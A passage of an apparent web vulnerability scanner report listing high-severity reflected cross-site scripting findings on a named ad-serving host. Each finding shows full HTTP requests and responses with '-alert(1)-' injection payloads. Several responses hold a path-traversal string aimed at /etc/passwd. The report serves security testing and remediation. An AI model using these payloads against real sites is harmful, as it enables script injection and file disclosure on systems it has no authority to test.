GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:00 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc7a1d176d75a886b936744456; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:00 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?48284'-alert(1)-'1a524591d7c;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.10. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae82'-alert(1)-'477998e8ab0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald3ae82'-alert(1)-'477998e8ab0/be_news;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.11. http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/be_news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac83b'-alert(1)-'4a7cc732c20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:47 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/be_news |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa92'-alert(1)-'ab795776af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/be_news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5634a'-alert(1)-'72ece40b226 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?5634a'-alert(1)-'72ece40b226 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?5634a'-alert(1)-'72ece40b226;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a879'-alert(1)-'64a75099063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:14 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:14 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8840e'-alert(1)-'d174ab07fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:20 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/q1.bosherald/ent_fr |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b65f'-alert(1)-'bf030976c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:08 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/ent_fr
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cedc7'-alert(1)-'a9dad4ab33d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:01 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d2fd5b0e622cff9d7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/news
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2596'-alert(1)-'065299ab6fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/news
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b4c'-alert(1)-'8f565e9fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/q1.bosherald/news
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86cf3'-alert(1)-'c4fb3c8bde4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
